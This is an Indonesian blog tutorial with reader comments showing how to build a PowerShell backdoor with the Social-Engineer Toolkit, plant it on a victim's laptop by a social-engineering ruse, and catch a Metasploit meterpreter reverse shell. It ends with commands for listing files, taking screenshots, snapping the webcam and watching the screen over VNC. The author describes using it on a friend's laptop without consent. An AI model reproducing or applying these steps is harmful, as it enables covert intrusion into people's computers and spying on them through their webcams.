Thursday, 14 January 2016

Hack Windows With Metasploit Using BackBox Linux


Haii semua ^^
bertemu lagi dengan mimin #OepilCore disini ,
kali ini gua bakalan share tentang Metasploit , ya metasploit ...
metasploit itu salah satu tool didalam Linux  untuk melakukan Pentesting ,
oke ,
yap gua berani membuat tutorial ini karena udah berhasil gua praktekan dan meremote leppy temen gua yang sedang main PES kwkwkwkw~



oke untuk materi kali ini , kita bakalan meremote pc orang menggunakan Setoolkit dan metasploit ,
yosh , udah ga usah banyak cincong , langsung simak ajah kwkwkw~ ><







Oke , Pertama-tama siapkan mental dan kekuatan dari tenaga dalam kwkwkw~ , bukan bukan , oke pertama-tama berdoa untuk dipermudah dalam melakukan hal ini ,

oke tutorial ini full Screenshot dari mimin #OepilCore

1) Buka Terminal Dan Login Sebagai super user ,
setelah masuk kedalam super user sekarang kita jalankan tool Setoolkit , Social Engineer Tool Kit , hahah~


2) Setelah itu muncul menu pilihannya , lalu kita pilih nomor 1 yaitu Social-engineering attacks

 

3)  setelah itu kita pilih powershell attack Vectors yaitu nomer 9

 

4) dan kita akan memilih PowerShell AlphaNumeric shellcode injector , yaitu nomer 1

 

5) setelah memilih nomer satu kita akan memasukan Ip kita , Port acces
untuk melihat ip kita bisa melihat di data rt setempat kwkwkw~ eh bukan bukan , bisa melihat dengan membuka terminal baru , dan menulis command ifconfig , dan cari ip kalian ,
dan untuk port bisa kalian isi bebeas , disini saya isi 8080 bisa 6969 ataupun angka sesuka hati anda ~

6) setelah itu kita lihat file backdoor yang sudah berhasil kita buat , kita ambil didalam powershell , kalo saya filenya sudah saya pindahkan kedalam hardisd D saya ,

 

7) setelah itu , silahkan kalian copy file tersebut kedalam flashdisk dan silahkan kalian copy ke leppy korban kwkwkw~ karena saya sedang berada di lab komputer dan sebagian pada buka laptop , jadi saya dengan spik spik alibi bilang mau copy anime kwkwkw~ , dan boom :3 saya copykan file ini ke leppy temen , lalu saya jalankan programnya ,

oke , disini perjalanan kita sudah hampir selesai , dan kita tinggal menjalankan meterpreter dari metasploit ,

8) buka terminal baru karena terminal kampung rambutan dan terminal blok m sudah terlalu ramai sama preman kwkwkw~ ,
setelah buka terminal baru silahkan masukkan command "Sudo msfconsole"


9) dan selanjutnya kita melakukan serangan ledakan kwkww~ dengan memasukkan , Use exploit/multi/handler

10) setelah itu kita membuat payload untuk meterpreter kita agar bisa meremote pc target
dengan command

set payload windows/meterpreter/reverse_tcp

lalu kita set Lhost dan lport sesuai dengan ip dan port kita yang awal kita bikin
di backdoor tadi
*Lihat Screenshotnya , jangan liat paha tetangga*

 

 

11 ) setelah kita lancarkan Exploit
kita tinggal tunggu response dari pc target , dan jika berhasil terkoneksi dengan laptop target maka akan terlihat tulisan seperti di ss, "
seperti ip target .

dan silahkan kita lakukan beberapa hal yang hanya saya dapat berikan , untuk selebihnya silahkan mencari-cari di tempat lain ^^

untuk melihat isi desktop korban kita dapat menuliskan command" ls "
 

dan jika ingin untuk mengambil screenshot dari desktop korban bisa menggunakan command " screenshot "
ini hasilnya dari laptop korban

ketawan kan dia lagi download yang bikin ngelag kwkwkwk~

dan jika kalian ingin mengambil gambar melalui webcam korban adalah dengan menggunakan command " webcam_snap "

bingoo , say cheese to camera broo kwkwkwk~
oke untuk selanjutnya kita bisa melihat hal apa yang sedang dia lakukan ataupun memonitoring , hanya dengan memasukkan command " run vnc "



dan kita lihat apa yang sedang ia lakukan ,

dan ternyata dia sedang bermain pes di leppynya kwkwkw~
and bingo :3 , dia sedang bermain game kwkwkw~

oke semuanya udah semuanya kan ? kwkwkw~ ingat ini hanya untuk sebagai pembelajaran semata yaa ~
oke untuk command command yang lainnya kalian bisa mencari-cari di mbah google ,

maafkan jika ada kesalahan kata ataupun kesalahan yang nampak maupun tidak ,
karena saya disini juga masih belajar dan saya hanya berbagi beberapa ilmu yang saya bisa ,


oke salam 1 jiwa *lohh kwkw bukan bukan bukan XD
oke semuanya #SalamLestari dan sekian semuanya terimakasih ,
Salam para penjinak pinguin :v , Viva Real Tux Warrior Gaes :'v wkkwkwkw



stay cool and keepcrootzz


*eeiitt tunggu :3 mau nyisipin foto pacar tersayang dulu* kwkwkwkwk

 

oke sampai bertemu di next post semuanya kwkwkw~ XD
~paypay minna XD


#OepilCore













Visit and follow :


FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

9 comments

awkakwkwak , eh bang bima :v
awkawkkwa tengkyu dah komen..
salam sukses bang


Nuenomaru

Tutor nya cadas. Btw ini perpaduan Metasploit dan SET ya

Harus pake Linux ya -___- kalo di warnet gmana?

yayoii bang ..
sukses kok bang, dah di praktekin sama OepilCore ^^

Nuenomaru

awkkawka mastah satu ini merendah molo :v
aloo bang yafi :v

Nuenomaru

awkkawkaw :v , coba aja cari , kali aja ada setoolkit & Metasploit yang bisa di jalanin di cmd windows awkkawka :v
#GoOpenSource Indonesia ^^

Nuenomaru


EmoticonEmoticon